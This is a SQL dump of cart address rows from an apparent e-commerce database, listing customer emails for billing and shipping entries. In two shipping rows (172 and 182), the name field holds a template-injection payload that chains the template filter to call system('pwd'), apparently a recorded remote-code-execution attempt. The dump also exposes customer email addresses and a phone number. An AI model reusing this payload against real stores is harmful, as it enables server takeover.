(139, 65, '2022-04-02 08:01:07', '2022-04-02 08:01:07', 38, 0, NULL, 'billing', 'abdolahahmadi5289@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(140, 65, '2022-04-02 08:01:07', '2022-04-02 08:01:07', 38, 0, NULL, 'shipping', 'abdolahahmadi5289@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(141, 66, '2022-04-03 02:35:49', '2022-04-03 02:35:49', 39, 0, NULL, 'billing', 'gejyxjsxtacaraphillips@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(142, 66, '2022-04-03 02:35:49', '2022-04-03 02:35:49', 39, 0, NULL, 'shipping', 'gejyxjsxtacaraphillips@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(143, 67, '2022-04-10 13:11:06', '2022-04-10 13:11:06', 40, 0, NULL, 'billing', 'hghyggyu@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(144, 67, '2022-04-10 13:11:06', '2022-04-10 13:11:06', 40, 0, NULL, 'shipping', 'hghyggyu@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(145, 68, '2022-04-16 06:33:30', '2022-04-16 06:33:30', 41, 0, NULL, 'billing', 'sedasertf710@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(146, 68, '2022-04-16 06:33:30', '2022-04-16 06:33:30', 41, 0, NULL, 'shipping', 'sedasertf710@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(147, 69, '2022-04-18 15:17:41', '2022-04-18 15:17:41', 42, 0, NULL, 'billing', 'mark.formel2356@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(148, 69, '2022-04-18 15:17:41', '2022-04-18 15:17:41', 42, 0, NULL, 'shipping', 'mark.formel2356@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(149, 70, '2022-04-23 00:03:57', '2022-04-23 00:03:57', 43, 0, NULL, 'billing', 'cinarmuge650@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(150, 70, '2022-04-23 00:03:57', '2022-04-23 00:03:57', 43, 0, NULL, 'shipping', 'cinarmuge650@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(151, 71, '2022-05-05 22:22:58', '2022-05-05 22:22:58', 44, 0, NULL, 'billing', 'Aannaedonnaey7797@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(152, 71, '2022-05-05 22:22:59', '2022-05-05 22:22:59', 44, 0, NULL, 'shipping', 'Aannaedonnaey7797@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(153, 72, '2022-05-06 18:26:19', '2022-05-06 18:26:19', 45, 0, NULL, 'billing', 'Aljudmilaodonnaab2943@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(154, 72, '2022-05-06 18:26:19', '2022-05-06 18:26:19', 45, 0, NULL, 'shipping', 'Aljudmilaodonnaab2943@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(155, 73, '2022-05-13 10:04:05', '2022-05-13 10:04:05', 46, 0, NULL, 'billing', 'kiemcainhan66111@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(156, 73, '2022-05-13 10:04:05', '2022-05-13 10:04:05', 46, 0, NULL, 'shipping', 'kiemcainhan66111@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(157, 74, '2022-05-14 01:52:47', '2022-05-14 01:52:47', 47, 0, NULL, 'billing', 'henrrycleoo102@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(158, 74, '2022-05-14 01:52:47', '2022-05-14 01:52:47', 47, 0, NULL, 'shipping', 'henrrycleoo102@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(159, 75, '2022-06-04 23:05:45', '2022-06-04 23:05:45', 48, 0, NULL, 'billing', '54alexanderrose@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(160, 75, '2022-06-04 23:05:45', '2022-06-04 23:05:45', 48, 0, NULL, 'shipping', '54alexanderrose@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(161, 76, '2022-06-22 14:50:39', '2022-06-22 14:50:39', 49, 0, NULL, 'billing', 'ujerimiahu57oa45@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(162, 76, '2022-06-22 14:50:39', '2022-06-22 14:50:39', 49, 0, NULL, 'shipping', 'ujerimiahu57oa45@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(163, 77, '2022-06-28 00:43:01', '2022-06-28 00:43:01', 50, 0, NULL, 'billing', 'zangelikak30a89zehc@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(164, 77, '2022-06-28 00:43:01', '2022-06-28 00:43:01', 50, 0, NULL, 'shipping', 'zangelikak30a89zehc@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(165, 78, '2022-07-20 04:55:14', '2022-07-20 04:55:14', 51, 0, NULL, 'billing', 'markiceu260ak82ekq9y@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(166, 78, '2022-07-20 04:55:14', '2022-07-20 04:55:14', 51, 0, NULL, 'shipping', 'markiceu260ak82ekq9y@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(167, 79, '2022-07-20 17:27:10', '2022-07-20 17:27:10', 52, 0, NULL, 'billing', 'vcolletteuo37w14z5iev0s@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(168, 79, '2022-07-20 17:27:11', '2022-07-20 17:27:11', 52, 0, NULL, 'shipping', 'vcolletteuo37w14z5iev0s@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(169, 80, '2022-07-29 22:54:22', '2022-07-29 22:54:22', 53, 0, NULL, 'billing', 'gsheika728i8f6go4o@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(170, 80, '2022-07-29 22:54:22', '2022-07-29 22:54:22', 53, 0, NULL, 'shipping', 'gsheika728i8f6go4o@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(171, 81, '2022-07-30 10:36:39', '2022-07-30 10:36:39', NULL, 0, NULL, 'billing', NULL, NULL, '1', NULL, '1', NULL, NULL, '3001 W OLD YANKTON RD', 'San Francisco', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(172, 81, '2022-07-30 10:36:39', '2022-07-30 10:36:47', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}', NULL, 'system', NULL, NULL, '3001 W OLD YANKTON RD', 'pwd', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(173, 82, '2022-07-30 13:14:46', '2022-07-30 13:14:46', 54, 0, NULL, 'billing', 'dkumiko461k0d5@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(174, 82, '2022-07-30 13:14:46', '2022-07-30 13:14:46', 54, 0, NULL, 'shipping', 'dkumiko461k0d5@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(175, 83, '2022-08-14 02:33:05', '2022-08-14 02:33:05', 55, 0, NULL, 'billing', 'dmoned651upqz@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(176, 83, '2022-08-14 02:33:05', '2022-08-14 02:33:05', 55, 0, NULL, 'shipping', 'dmoned651upqz@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(177, 84, '2022-08-28 04:30:38', '2022-08-28 04:30:38', 56, 0, NULL, 'billing', 'daveonb3l380b4j79@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(178, 84, '2022-08-28 04:30:38', '2022-08-28 04:30:38', 56, 0, NULL, 'shipping', 'daveonb3l380b4j79@outlook.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(179, 85, '2022-08-31 15:48:54', '2022-08-31 15:48:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(180, 85, '2022-08-31 15:48:54', '2022-08-31 15:48:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(181, 86, '2022-09-27 13:18:55', '2022-09-27 13:18:55', NULL, 0, NULL, 'billing', NULL, NULL, '1', NULL, '1', NULL, NULL, '3001 W OLD YANKTON RD', 'San Francisco', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(182, 86, '2022-09-27 13:18:55', '2022-09-27 13:19:06', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}', NULL, 'system', NULL, NULL, '3001 W OLD YANKTON RD', 'pwd', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
